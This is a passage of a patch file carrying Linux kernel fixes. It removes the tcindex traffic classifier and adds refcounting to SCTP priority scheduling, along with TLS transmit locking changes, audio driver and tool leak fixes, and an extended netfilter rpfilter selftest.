+-	cp->alloc_hash = p->alloc_hash;
+-	cp->fall_through = p->fall_through;
+-	cp->tp = tp;
+-	refcount_set(&cp->refcnt, 1); /* Paired with tcindex_destroy_work() */
+-
+-	if (tb[TCA_TCINDEX_HASH])
+-		cp->hash = nla_get_u32(tb[TCA_TCINDEX_HASH]);
+-
+-	if (tb[TCA_TCINDEX_MASK])
+-		cp->mask = nla_get_u16(tb[TCA_TCINDEX_MASK]);
+-
+-	if (tb[TCA_TCINDEX_SHIFT]) {
+-		cp->shift = nla_get_u32(tb[TCA_TCINDEX_SHIFT]);
+-		if (cp->shift > 16) {
+-			err = -EINVAL;
+-			goto errout;
+-		}
+-	}
+-	if (!cp->hash) {
+-		/* Hash not specified, use perfect hash if the upper limit
+-		 * of the hashing index is below the threshold.
+-		 */
+-		if ((cp->mask >> cp->shift) < PERFECT_HASH_THRESHOLD)
+-			cp->hash = (cp->mask >> cp->shift) + 1;
+-		else
+-			cp->hash = DEFAULT_HASH_SIZE;
+-	}
+-
+-	if (p->perfect) {
+-		int i;
+-
+-		if (tcindex_alloc_perfect_hash(net, cp) < 0)
+-			goto errout;
+-		cp->alloc_hash = cp->hash;
+-		for (i = 0; i < min(cp->hash, p->hash); i++)
+-			cp->perfect[i].res = p->perfect[i].res;
+-		balloc = 1;
+-	}
+-	cp->h = p->h;
+-
+-	err = tcindex_filter_result_init(&new_filter_result, cp, net);
+-	if (err < 0)
+-		goto errout_alloc;
+-	if (r)
+-		cr = r->res;
+-
+-	err = -EBUSY;
+-
+-	/* Hash already allocated, make sure that we still meet the
+-	 * requirements for the allocated hash.
+-	 */
+-	if (cp->perfect) {
+-		if (!valid_perfect_hash(cp) ||
+-		    cp->hash > cp->alloc_hash)
+-			goto errout_alloc;
+-	} else if (cp->h && cp->hash != cp->alloc_hash) {
+-		goto errout_alloc;
+-	}
+-
+-	err = -EINVAL;
+-	if (tb[TCA_TCINDEX_FALL_THROUGH])
+-		cp->fall_through = nla_get_u32(tb[TCA_TCINDEX_FALL_THROUGH]);
+-
+-	if (!cp->perfect && !cp->h)
+-		cp->alloc_hash = cp->hash;
+-
+-	/* Note: this could be as restrictive as if (handle & ~(mask >> shift))
+-	 * but then, we'd fail handles that may become valid after some future
+-	 * mask change. While this is extremely unlikely to ever matter,
+-	 * the check below is safer (and also more backwards-compatible).
+-	 */
+-	if (cp->perfect || valid_perfect_hash(cp))
+-		if (handle >= cp->alloc_hash)
+-			goto errout_alloc;
+-
+-
+-	err = -ENOMEM;
+-	if (!cp->perfect && !cp->h) {
+-		if (valid_perfect_hash(cp)) {
+-			if (tcindex_alloc_perfect_hash(net, cp) < 0)
+-				goto errout_alloc;
+-			balloc = 1;
+-		} else {
+-			struct tcindex_filter __rcu **hash;
+-
+-			hash = kcalloc(cp->hash,
+-				       sizeof(struct tcindex_filter *),
+-				       GFP_KERNEL);
+-
+-			if (!hash)
+-				goto errout_alloc;
+-
+-			cp->h = hash;
+-			balloc = 2;
+-		}
+-	}
+-
+-	if (cp->perfect) {
+-		r = cp->perfect + handle;
+-	} else {
+-		/* imperfect area is updated in-place using rcu */
+-		update_h = !!tcindex_lookup(cp, handle);
+-		r = &new_filter_result;
+-	}
+-
+-	if (r == &new_filter_result) {
+-		f = kzalloc(sizeof(*f), GFP_KERNEL);
+-		if (!f)
+-			goto errout_alloc;
+-		f->key = handle;
+-		f->next = NULL;
+-		err = tcindex_filter_result_init(&f->result, cp, net);
+-		if (err < 0) {
+-			kfree(f);
+-			goto errout_alloc;
+-		}
+-	}
+-
+-	if (tb[TCA_TCINDEX_CLASSID]) {
+-		cr.classid = nla_get_u32(tb[TCA_TCINDEX_CLASSID]);
+-		tcf_bind_filter(tp, &cr, base);
+-	}
+-
+-	oldp = p;
+-	r->res = cr;
+-	tcf_exts_change(&r->exts, &e);
+-
+-	rcu_assign_pointer(tp->root, cp);
+-
+-	if (update_h) {
+-		struct tcindex_filter __rcu **fp;
+-		struct tcindex_filter *cf;
+-
+-		f->result.res = r->res;
+-		tcf_exts_change(&f->result.exts, &r->exts);
+-
+-		/* imperfect area bucket */
+-		fp = cp->h + (handle % cp->hash);
+-
+-		/* lookup the filter, guaranteed to exist */
+-		for (cf = rcu_dereference_bh_rtnl(*fp); cf;
+-		     fp = &cf->next, cf = rcu_dereference_bh_rtnl(*fp))
+-			if (cf->key == (u16)handle)
+-				break;
+-
+-		f->next = cf->next;
+-
+-		cf = rcu_replace_pointer(*fp, f, 1);
+-		tcf_exts_get_net(&cf->result.exts);
+-		tcf_queue_work(&cf->rwork, tcindex_destroy_fexts_work);
+-	} else if (r == &new_filter_result) {
+-		struct tcindex_filter *nfp;
+-		struct tcindex_filter __rcu **fp;
+-
+-		f->result.res = r->res;
+-		tcf_exts_change(&f->result.exts, &r->exts);
+-
+-		fp = cp->h + (handle % cp->hash);
+-		for (nfp = rtnl_dereference(*fp);
+-		     nfp;
+-		     fp = &nfp->next, nfp = rtnl_dereference(*fp))
+-				; /* nothing */
+-
+-		rcu_assign_pointer(*fp, f);
+-	} else {
+-		tcf_exts_destroy(&new_filter_result.exts);
+-	}
+-
+-	if (oldp)
+-		tcf_queue_work(&oldp->rwork, tcindex_partial_destroy_work);
+-	return 0;
+-
+-errout_alloc:
+-	if (balloc == 1)
+-		tcindex_free_perfect_hash(cp);
+-	else if (balloc == 2)
+-		kfree(cp->h);
+-	tcf_exts_destroy(&new_filter_result.exts);
+-errout:
+-	kfree(cp);
+-	tcf_exts_destroy(&e);
+-	return err;
+-}
+-
+-static int
+-tcindex_change(struct net *net, struct sk_buff *in_skb,
+-	       struct tcf_proto *tp, unsigned long base, u32 handle,
+-	       struct nlattr **tca, void **arg, u32 flags,
+-	       struct netlink_ext_ack *extack)
+-{
+-	struct nlattr *opt = tca[TCA_OPTIONS];
+-	struct nlattr *tb[TCA_TCINDEX_MAX + 1];
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter_result *r = *arg;
+-	int err;
+-
+-	pr_debug("tcindex_change(tp %p,handle 0x%08x,tca %p,arg %p),opt %p,"
+-	    "p %p,r %p,*arg %p\n",
+-	    tp, handle, tca, arg, opt, p, r, *arg);
+-
+-	if (!opt)
+-		return 0;
+-
+-	err = nla_parse_nested_deprecated(tb, TCA_TCINDEX_MAX, opt,
+-					  tcindex_policy, NULL);
+-	if (err < 0)
+-		return err;
+-
+-	return tcindex_set_parms(net, tp, base, handle, p, r, tb,
+-				 tca[TCA_RATE], flags, extack);
+-}
+-
+-static void tcindex_walk(struct tcf_proto *tp, struct tcf_walker *walker,
+-			 bool rtnl_held)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter *f, *next;
+-	int i;
+-
+-	pr_debug("tcindex_walk(tp %p,walker %p),p %p\n", tp, walker, p);
+-	if (p->perfect) {
+-		for (i = 0; i < p->hash; i++) {
+-			if (!p->perfect[i].res.class)
+-				continue;
+-			if (!tc_cls_stats_dump(tp, walker, p->perfect + i))
+-				return;
+-		}
+-	}
+-	if (!p->h)
+-		return;
+-	for (i = 0; i < p->hash; i++) {
+-		for (f = rtnl_dereference(p->h[i]); f; f = next) {
+-			next = rtnl_dereference(f->next);
+-			if (!tc_cls_stats_dump(tp, walker, &f->result))
+-				return;
+-		}
+-	}
+-}
+-
+-static void tcindex_destroy(struct tcf_proto *tp, bool rtnl_held,
+-			    struct netlink_ext_ack *extack)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	int i;
+-
+-	pr_debug("tcindex_destroy(tp %p),p %p\n", tp, p);
+-
+-	if (p->perfect) {
+-		for (i = 0; i < p->hash; i++) {
+-			struct tcindex_filter_result *r = p->perfect + i;
+-
+-			/* tcf_queue_work() does not guarantee the ordering we
+-			 * want, so we have to take this refcnt temporarily to
+-			 * ensure 'p' is freed after all tcindex_filter_result
+-			 * here. Imperfect hash does not need this, because it
+-			 * uses linked lists rather than an array.
+-			 */
+-			tcindex_data_get(p);
+-
+-			tcf_unbind_filter(tp, &r->res);
+-			if (tcf_exts_get_net(&r->exts))
+-				tcf_queue_work(&r->rwork,
+-					       tcindex_destroy_rexts_work);
+-			else
+-				__tcindex_destroy_rexts(r);
+-		}
+-	}
+-
+-	for (i = 0; p->h && i < p->hash; i++) {
+-		struct tcindex_filter *f, *next;
+-		bool last;
+-
+-		for (f = rtnl_dereference(p->h[i]); f; f = next) {
+-			next = rtnl_dereference(f->next);
+-			tcindex_delete(tp, &f->result, &last, rtnl_held, NULL);
+-		}
+-	}
+-
+-	tcf_queue_work(&p->rwork, tcindex_destroy_work);
+-}
+-
+-
+-static int tcindex_dump(struct net *net, struct tcf_proto *tp, void *fh,
+-			struct sk_buff *skb, struct tcmsg *t, bool rtnl_held)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter_result *r = fh;
+-	struct nlattr *nest;
+-
+-	pr_debug("tcindex_dump(tp %p,fh %p,skb %p,t %p),p %p,r %p\n",
+-		 tp, fh, skb, t, p, r);
+-	pr_debug("p->perfect %p p->h %p\n", p->perfect, p->h);
+-
+-	nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
+-	if (nest == NULL)
+-		goto nla_put_failure;
+-
+-	if (!fh) {
+-		t->tcm_handle = ~0; /* whatever ... */
+-		if (nla_put_u32(skb, TCA_TCINDEX_HASH, p->hash) ||
+-		    nla_put_u16(skb, TCA_TCINDEX_MASK, p->mask) ||
+-		    nla_put_u32(skb, TCA_TCINDEX_SHIFT, p->shift) ||
+-		    nla_put_u32(skb, TCA_TCINDEX_FALL_THROUGH, p->fall_through))
+-			goto nla_put_failure;
+-		nla_nest_end(skb, nest);
+-	} else {
+-		if (p->perfect) {
+-			t->tcm_handle = r - p->perfect;
+-		} else {
+-			struct tcindex_filter *f;
+-			struct tcindex_filter __rcu **fp;
+-			int i;
+-
+-			t->tcm_handle = 0;
+-			for (i = 0; !t->tcm_handle && i < p->hash; i++) {
+-				fp = &p->h[i];
+-				for (f = rtnl_dereference(*fp);
+-				     !t->tcm_handle && f;
+-				     fp = &f->next, f = rtnl_dereference(*fp)) {
+-					if (&f->result == r)
+-						t->tcm_handle = f->key;
+-				}
+-			}
+-		}
+-		pr_debug("handle = %d\n", t->tcm_handle);
+-		if (r->res.class &&
+-		    nla_put_u32(skb, TCA_TCINDEX_CLASSID, r->res.classid))
+-			goto nla_put_failure;
+-
+-		if (tcf_exts_dump(skb, &r->exts) < 0)
+-			goto nla_put_failure;
+-		nla_nest_end(skb, nest);
+-
+-		if (tcf_exts_dump_stats(skb, &r->exts) < 0)
+-			goto nla_put_failure;
+-	}
+-
+-	return skb->len;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, nest);
+-	return -1;
+-}
+-
+-static void tcindex_bind_class(void *fh, u32 classid, unsigned long cl,
+-			       void *q, unsigned long base)
+-{
+-	struct tcindex_filter_result *r = fh;
+-
+-	tc_cls_bind_class(classid, cl, q, &r->res, base);
+-}
+-
+-static struct tcf_proto_ops cls_tcindex_ops __read_mostly = {
+-	.kind		=	"tcindex",
+-	.classify	=	tcindex_classify,
+-	.init		=	tcindex_init,
+-	.destroy	=	tcindex_destroy,
+-	.get		=	tcindex_get,
+-	.change		=	tcindex_change,
+-	.delete		=	tcindex_delete,
+-	.walk		=	tcindex_walk,
+-	.dump		=	tcindex_dump,
+-	.bind_class	=	tcindex_bind_class,
+-	.owner		=	THIS_MODULE,
+-};
+-
+-static int __init init_tcindex(void)
+-{
+-	return register_tcf_proto_ops(&cls_tcindex_ops);
+-}
+-
+-static void __exit exit_tcindex(void)
+-{
+-	unregister_tcf_proto_ops(&cls_tcindex_ops);
+-}
+-
+-module_init(init_tcindex)
+-module_exit(exit_tcindex)
+-MODULE_LICENSE("GPL");
+diff --git a/net/sctp/stream_sched_prio.c b/net/sctp/stream_sched_prio.c
+index 4fc9f2923ed11..7dd9f8b387cca 100644
+--- a/net/sctp/stream_sched_prio.c
++++ b/net/sctp/stream_sched_prio.c
+@@ -25,6 +25,18 @@
+ 
+ static void sctp_sched_prio_unsched_all(struct sctp_stream *stream);
+ 
++static struct sctp_stream_priorities *sctp_sched_prio_head_get(struct sctp_stream_priorities *p)
++{
++	p->users++;
++	return p;
++}
++
++static void sctp_sched_prio_head_put(struct sctp_stream_priorities *p)
++{
++	if (p && --p->users == 0)
++		kfree(p);
++}
++
+ static struct sctp_stream_priorities *sctp_sched_prio_new_head(
+ 			struct sctp_stream *stream, int prio, gfp_t gfp)
+ {
+@@ -38,6 +50,7 @@ static struct sctp_stream_priorities *sctp_sched_prio_new_head(
+ 	INIT_LIST_HEAD(&p->active);
+ 	p->next = NULL;
+ 	p->prio = prio;
++	p->users = 1;
+ 
+ 	return p;
+ }
+@@ -53,7 +66,7 @@ static struct sctp_stream_priorities *sctp_sched_prio_get_head(
+ 	 */
+ 	list_for_each_entry(p, &stream->prio_list, prio_sched) {
+ 		if (p->prio == prio)
+-			return p;
++			return sctp_sched_prio_head_get(p);
+ 		if (p->prio > prio)
+ 			break;
+ 	}
+@@ -70,7 +83,7 @@ static struct sctp_stream_priorities *sctp_sched_prio_get_head(
+ 			 */
+ 			break;
+ 		if (p->prio == prio)
+-			return p;
++			return sctp_sched_prio_head_get(p);
+ 	}
+ 
+ 	/* If not even there, allocate a new one. */
+@@ -154,32 +167,21 @@ static int sctp_sched_prio_set(struct sctp_stream *stream, __u16 sid,
+ 	struct sctp_stream_out_ext *soute = sout->ext;
+ 	struct sctp_stream_priorities *prio_head, *old;
+ 	bool reschedule = false;
+-	int i;
++
++	old = soute->prio_head;
++	if (old && old->prio == prio)
++		return 0;
+ 
+ 	prio_head = sctp_sched_prio_get_head(stream, prio, gfp);
+ 	if (!prio_head)
+ 		return -ENOMEM;
+ 
+ 	reschedule = sctp_sched_prio_unsched(soute);
+-	old = soute->prio_head;
+ 	soute->prio_head = prio_head;
+ 	if (reschedule)
+ 		sctp_sched_prio_sched(stream, soute);
+ 
+-	if (!old)
+-		/* Happens when we set the priority for the first time */
+-		return 0;
+-
+-	for (i = 0; i < stream->outcnt; i++) {
+-		soute = SCTP_SO(stream, i)->ext;
+-		if (soute && soute->prio_head == old)
+-			/* It's still in use, nothing else to do here. */
+-			return 0;
+-	}
+-
+-	/* No hits, we are good to free it. */
+-	kfree(old);
+-
++	sctp_sched_prio_head_put(old);
+ 	return 0;
+ }
+ 
+@@ -206,20 +208,8 @@ static int sctp_sched_prio_init_sid(struct sctp_stream *stream, __u16 sid,
+ 
+ static void sctp_sched_prio_free_sid(struct sctp_stream *stream, __u16 sid)
+ {
+-	struct sctp_stream_priorities *prio = SCTP_SO(stream, sid)->ext->prio_head;
+-	int i;
+-
+-	if (!prio)
+-		return;
+-
++	sctp_sched_prio_head_put(SCTP_SO(stream, sid)->ext->prio_head);
+ 	SCTP_SO(stream, sid)->ext->prio_head = NULL;
+-	for (i = 0; i < stream->outcnt; i++) {
+-		if (SCTP_SO(stream, i)->ext &&
+-		    SCTP_SO(stream, i)->ext->prio_head == prio)
+-			return;
+-	}
+-
+-	kfree(prio);
+ }
+ 
+ static void sctp_sched_prio_free(struct sctp_stream *stream)
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index a83d2b4275fa6..38dcd9b401027 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -941,7 +941,9 @@ int tls_sw_sendmsg(struct sock *sk, struct msghdr *msg, size_t size)
+ 			       MSG_CMSG_COMPAT))
+ 		return -EOPNOTSUPP;
+ 
+-	mutex_lock(&tls_ctx->tx_lock);
++	ret = mutex_lock_interruptible(&tls_ctx->tx_lock);
++	if (ret)
++		return ret;
+ 	lock_sock(sk);
+ 
+ 	if (unlikely(msg->msg_controllen)) {
+@@ -1275,7 +1277,9 @@ int tls_sw_sendpage(struct sock *sk, struct page *page,
+ 		      MSG_SENDPAGE_NOTLAST | MSG_SENDPAGE_NOPOLICY))
+ 		return -EOPNOTSUPP;
+ 
+-	mutex_lock(&tls_ctx->tx_lock);
++	ret = mutex_lock_interruptible(&tls_ctx->tx_lock);
++	if (ret)
++		return ret;
+ 	lock_sock(sk);
+ 	ret = tls_sw_do_sendpage(sk, page, offset, size, flags);
+ 	release_sock(sk);
+@@ -2416,11 +2420,19 @@ static void tx_work_handler(struct work_struct *work)
+ 
+ 	if (!test_and_clear_bit(BIT_TX_SCHEDULED, &ctx->tx_bitmask))
+ 		return;
+-	mutex_lock(&tls_ctx->tx_lock);
+-	lock_sock(sk);
+-	tls_tx_records(sk, -1);
+-	release_sock(sk);
+-	mutex_unlock(&tls_ctx->tx_lock);
++
++	if (mutex_trylock(&tls_ctx->tx_lock)) {
++		lock_sock(sk);
++		tls_tx_records(sk, -1);
++		release_sock(sk);
++		mutex_unlock(&tls_ctx->tx_lock);
++	} else if (!test_and_set_bit(BIT_TX_SCHEDULED, &ctx->tx_bitmask)) {
++		/* Someone is holding the tx_lock, they will likely run Tx
++		 * and cancel the work on their way out of the lock section.
++		 * Schedule a long delay just in case.
++		 */
++		schedule_delayed_work(&ctx->tx_work.work, msecs_to_jiffies(10));
++	}
+ }
+ 
+ static bool tls_is_tx_ready(struct tls_sw_context_tx *ctx)
+diff --git a/sound/soc/apple/mca.c b/sound/soc/apple/mca.c
+index 24381c42eb54c..64750db9b9639 100644
+--- a/sound/soc/apple/mca.c
++++ b/sound/soc/apple/mca.c
+@@ -101,7 +101,6 @@
+ #define SERDES_CONF_UNK3	BIT(14)
+ #define SERDES_CONF_NO_DATA_FEEDBACK	BIT(15)
+ #define SERDES_CONF_SYNC_SEL	GENMASK(18, 16)
+-#define SERDES_CONF_SOME_RST	BIT(19)
+ #define REG_TX_SERDES_BITSTART	0x08
+ #define REG_RX_SERDES_BITSTART	0x0c
+ #define REG_TX_SERDES_SLOTMASK	0x0c
+@@ -203,15 +202,24 @@ static void mca_fe_early_trigger(struct snd_pcm_substream *substream, int cmd,
+ 	case SNDRV_PCM_TRIGGER_START:
+ 	case SNDRV_PCM_TRIGGER_RESUME:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_RELEASE:
++		mca_modify(cl, serdes_conf, SERDES_CONF_SYNC_SEL,
++			   FIELD_PREP(SERDES_CONF_SYNC_SEL, 0));
++		mca_modify(cl, serdes_conf, SERDES_CONF_SYNC_SEL,
++			   FIELD_PREP(SERDES_CONF_SYNC_SEL, 7));
+ 		mca_modify(cl, serdes_unit + REG_SERDES_STATUS,
+ 			   SERDES_STATUS_EN | SERDES_STATUS_RST,
+ 			   SERDES_STATUS_RST);
+-		mca_modify(cl, serdes_conf, SERDES_CONF_SOME_RST,
+-			   SERDES_CONF_SOME_RST);
+-		readl_relaxed(cl->base + serdes_conf);
+-		mca_modify(cl, serdes_conf, SERDES_STATUS_RST, 0);
+-		WARN_ON(readl_relaxed(cl->base + REG_SERDES_STATUS) &
++		/*
++		 * Experiments suggest that it takes at most ~1 us
++		 * for the bit to clear, so wait 2 us for good measure.
++		 */
++		udelay(2);
++		WARN_ON(readl_relaxed(cl->base + serdes_unit + REG_SERDES_STATUS) &
+ 			SERDES_STATUS_RST);
++		mca_modify(cl, serdes_conf, SERDES_CONF_SYNC_SEL,
++			   FIELD_PREP(SERDES_CONF_SYNC_SEL, 0));
++		mca_modify(cl, serdes_conf, SERDES_CONF_SYNC_SEL,
++			   FIELD_PREP(SERDES_CONF_SYNC_SEL, cl->no + 1));
+ 		break;
+ 	default:
+ 		break;
+@@ -942,10 +950,17 @@ static int mca_pcm_new(struct snd_soc_component *component,
+ 		chan = mca_request_dma_channel(cl, i);
+ 
+ 		if (IS_ERR_OR_NULL(chan)) {
++			mca_pcm_free(component, rtd->pcm);
++
++			if (chan && PTR_ERR(chan) == -EPROBE_DEFER)
++				return PTR_ERR(chan);
++
+ 			dev_err(component->dev, "unable to obtain DMA channel (stream %d cluster %d): %pe\n",
+ 				i, cl->no, chan);
+-			mca_pcm_free(component, rtd->pcm);
+-			return -EINVAL;
++
++			if (!chan)
++				return -EINVAL;
++			return PTR_ERR(chan);
+ 		}
+ 
+ 		cl->dma_chans[i] = chan;
+diff --git a/sound/soc/codecs/Kconfig b/sound/soc/codecs/Kconfig
+index 7022e6286e6cb..3f16ad1c37585 100644
+--- a/sound/soc/codecs/Kconfig
++++ b/sound/soc/codecs/Kconfig
+@@ -2039,6 +2039,7 @@ config SND_SOC_WSA883X
+ config SND_SOC_ZL38060
+ 	tristate "Microsemi ZL38060 Connected Home Audio Processor"
+ 	depends on SPI_MASTER
++	depends on GPIOLIB
+ 	select REGMAP
+ 	help
+ 	  Support for ZL38060 Connected Home Audio Processor from Microsemi,
+diff --git a/sound/soc/codecs/adau7118.c b/sound/soc/codecs/adau7118.c
+index bbb0972498876..a663d37e57760 100644
+--- a/sound/soc/codecs/adau7118.c
++++ b/sound/soc/codecs/adau7118.c
+@@ -444,22 +444,6 @@ static const struct snd_soc_component_driver adau7118_component_driver = {
+ 	.endianness		= 1,
+ };
+ 
+-static void adau7118_regulator_disable(void *data)
+-{
+-	struct adau7118_data *st = data;
+-	int ret;
+-	/*
+-	 * If we fail to disable DVDD, don't bother in trying IOVDD. We
+-	 * actually don't want to be left in the situation where DVDD
+-	 * is enabled and IOVDD is disabled.
+-	 */
+-	ret = regulator_disable(st->dvdd);
+-	if (ret)
+-		return;
+-
+-	regulator_disable(st->iovdd);
+-}
+-
+ static int adau7118_regulator_setup(struct adau7118_data *st)
+ {
+ 	st->iovdd = devm_regulator_get(st->dev, "iovdd");
+@@ -481,8 +465,7 @@ static int adau7118_regulator_setup(struct adau7118_data *st)
+ 		regcache_cache_only(st->map, true);
+ 	}
+ 
+-	return devm_add_action_or_reset(st->dev, adau7118_regulator_disable,
+-					st);
++	return 0;
+ }
+ 
+ static int adau7118_parset_dt(const struct adau7118_data *st)
+diff --git a/sound/soc/mediatek/mt8195/mt8195-dai-etdm.c b/sound/soc/mediatek/mt8195/mt8195-dai-etdm.c
+index c2e268054773d..f2c9a1fdbe0d0 100644
+--- a/sound/soc/mediatek/mt8195/mt8195-dai-etdm.c
++++ b/sound/soc/mediatek/mt8195/mt8195-dai-etdm.c
+@@ -2567,6 +2567,9 @@ static void mt8195_dai_etdm_parse_of(struct mtk_base_afe *afe)
+ 
+ 	/* etdm in only */
+ 	for (i = 0; i < 2; i++) {
++		dai_id = ETDM_TO_DAI_ID(i);
++		etdm_data = afe_priv->dai_priv[dai_id];
++
+ 		ret = snprintf(prop, sizeof(prop),
+ 			       "mediatek,%s-chn-disabled",
+ 			       of_afe_etdms[i].name);
+diff --git a/tools/iio/iio_utils.c b/tools/iio/iio_utils.c
+index 8d35893b2fa85..6a00a6eecaef0 100644
+--- a/tools/iio/iio_utils.c
++++ b/tools/iio/iio_utils.c
+@@ -264,6 +264,7 @@ int iioutils_get_param_float(float *output, const char *param_name,
+ 			if (fscanf(sysfsfp, "%f", output) != 1)
+ 				ret = errno ? -errno : -ENODATA;
+ 
++			fclose(sysfsfp);
+ 			break;
+ 		}
+ error_free_filename:
+@@ -345,9 +346,9 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 			}
+ 
+ 			sysfsfp = fopen(filename, "r");
++			free(filename);
+ 			if (!sysfsfp) {
+ 				ret = -errno;
+-				free(filename);
+ 				goto error_close_dir;
+ 			}
+ 
+@@ -357,7 +358,6 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 				if (fclose(sysfsfp))
+ 					perror("build_channel_array(): Failed to close file");
+ 
+-				free(filename);
+ 				goto error_close_dir;
+ 			}
+ 			if (ret == 1)
+@@ -365,11 +365,9 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 
+ 			if (fclose(sysfsfp)) {
+ 				ret = -errno;
+-				free(filename);
+ 				goto error_close_dir;
+ 			}
+ 
+-			free(filename);
+ 		}
+ 
+ 	*ci_array = malloc(sizeof(**ci_array) * (*counter));
+@@ -395,9 +393,9 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 			}
+ 
+ 			sysfsfp = fopen(filename, "r");
++			free(filename);
+ 			if (!sysfsfp) {
+ 				ret = -errno;
+-				free(filename);
+ 				count--;
+ 				goto error_cleanup_array;
+ 			}
+@@ -405,20 +403,17 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 			errno = 0;
+ 			if (fscanf(sysfsfp, "%i", &current_enabled) != 1) {
+ 				ret = errno ? -errno : -ENODATA;
+-				free(filename);
+ 				count--;
+ 				goto error_cleanup_array;
+ 			}
+ 
+ 			if (fclose(sysfsfp)) {
+ 				ret = -errno;
+-				free(filename);
+ 				count--;
+ 				goto error_cleanup_array;
+ 			}
+ 
+ 			if (!current_enabled) {
+-				free(filename);
+ 				count--;
+ 				continue;
+ 			}
+@@ -429,7 +424,6 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 						strlen(ent->d_name) -
+ 						strlen("_en"));
+ 			if (!current->name) {
+-				free(filename);
+ 				ret = -ENOMEM;
+ 				count--;
+ 				goto error_cleanup_array;
+@@ -439,7 +433,6 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 			ret = iioutils_break_up_name(current->name,
+ 						     &current->generic_name);
+ 			if (ret) {
+-				free(filename);
+ 				free(current->name);
+ 				count--;
+ 				goto error_cleanup_array;
+@@ -450,17 +443,16 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 				       scan_el_dir,
+ 				       current->name);
+ 			if (ret < 0) {
+-				free(filename);
+ 				ret = -ENOMEM;
+ 				goto error_cleanup_array;
+ 			}
+ 
+ 			sysfsfp = fopen(filename, "r");
++			free(filename);
+ 			if (!sysfsfp) {
+ 				ret = -errno;
+-				fprintf(stderr, "failed to open %s\n",
+-					filename);
+-				free(filename);
++				fprintf(stderr, "failed to open %s/%s_index\n",
++					scan_el_dir, current->name);
+ 				goto error_cleanup_array;
+ 			}
+ 
+@@ -470,17 +462,14 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 				if (fclose(sysfsfp))
+ 					perror("build_channel_array(): Failed to close file");
+ 
+-				free(filename);
+ 				goto error_cleanup_array;
+ 			}
+ 
+ 			if (fclose(sysfsfp)) {
+ 				ret = -errno;
+-				free(filename);
+ 				goto error_cleanup_array;
+ 			}
+ 
+-			free(filename);
+ 			/* Find the scale */
+ 			ret = iioutils_get_param_float(&current->scale,
+ 						       "scale",
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index 0c1b6acad141f..730b49e255e44 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -668,6 +668,7 @@ static int create_static_call_sections(struct objtool_file *file)
+ 		if (strncmp(key_name, STATIC_CALL_TRAMP_PREFIX_STR,
+ 			    STATIC_CALL_TRAMP_PREFIX_LEN)) {
+ 			WARN("static_call: trampoline name malformed: %s", key_name);
++			free(key_name);
+ 			return -1;
+ 		}
+ 		tmp = key_name + STATIC_CALL_TRAMP_PREFIX_LEN - STATIC_CALL_KEY_PREFIX_LEN;
+@@ -677,6 +678,7 @@ static int create_static_call_sections(struct objtool_file *file)
+ 		if (!key_sym) {
+ 			if (!opts.module) {
+ 				WARN("static_call: can't find static_call_key symbol: %s", tmp);
++				free(key_name);
+ 				return -1;
+ 			}
+ 
+diff --git a/tools/testing/selftests/netfilter/rpath.sh b/tools/testing/selftests/netfilter/rpath.sh
+index f7311e66d2193..5289c8447a419 100755
+--- a/tools/testing/selftests/netfilter/rpath.sh
++++ b/tools/testing/selftests/netfilter/rpath.sh
+@@ -62,10 +62,16 @@ ip -net "$ns1" a a fec0:42::2/64 dev v0 nodad
+ ip -net "$ns2" a a fec0:42::1/64 dev d0 nodad
+ 
+ # firewall matches to test
+-[ -n "$iptables" ] && ip netns exec "$ns2" \
+-	"$iptables" -t raw -A PREROUTING -s 192.168.0.0/16 -m rpfilter
+-[ -n "$ip6tables" ] && ip netns exec "$ns2" \
+-	"$ip6tables" -t raw -A PREROUTING -s fec0::/16 -m rpfilter
++[ -n "$iptables" ] && {
++	common='-t raw -A PREROUTING -s 192.168.0.0/16'
++	ip netns exec "$ns2" "$iptables" $common -m rpfilter
++	ip netns exec "$ns2" "$iptables" $common -m rpfilter --invert
++}
++[ -n "$ip6tables" ] && {
++	common='-t raw -A PREROUTING -s fec0::/16'
++	ip netns exec "$ns2" "$ip6tables" $common -m rpfilter
++	ip netns exec "$ns2" "$ip6tables" $common -m rpfilter --invert
++}
+ [ -n "$nft" ] && ip netns exec "$ns2" $nft -f - <<EOF
+ table inet t {
+ 	chain c {
+@@ -89,6 +95,11 @@ ipt_zero_rule() { # (command)
+ 	[ -n "$1" ] || return 0
+ 	ip netns exec "$ns2" "$1" -t raw -vS | grep -q -- "-m rpfilter -c 0 0"
+ }
++ipt_zero_reverse_rule() { # (command)
++	[ -n "$1" ] || return 0
++	ip netns exec "$ns2" "$1" -t raw -vS | \
++		grep -q -- "-m rpfilter --invert -c 0 0"
++}
+ nft_zero_rule() { # (family)
+ 	[ -n "$nft" ] || return 0
+ 	ip netns exec "$ns2" "$nft" list chain inet t c | \
+@@ -101,8 +112,7 @@ netns_ping() { # (netns, args...)
+ 	ip netns exec "$netns" ping -q -c 1 -W 1 "$@" >/dev/null
+ }
+ 
+-testrun() {
+-	# clear counters first
++clear_counters() {
+ 	[ -n "$iptables" ] && ip netns exec "$ns2" "$iptables" -t raw -Z
+ 	[ -n "$ip6tables" ] && ip netns exec "$ns2" "$ip6tables" -t raw -Z
+ 	if [ -n "$nft" ]; then
+@@ -111,6 +121,10 @@ testrun() {
+ 			ip netns exec "$ns2" $nft -s list table inet t;
+ 		) | ip netns exec "$ns2" $nft -f -
+ 	fi
++}
++
++testrun() {
++	clear_counters
+ 
+ 	# test 1: martian traffic should fail rpfilter matches
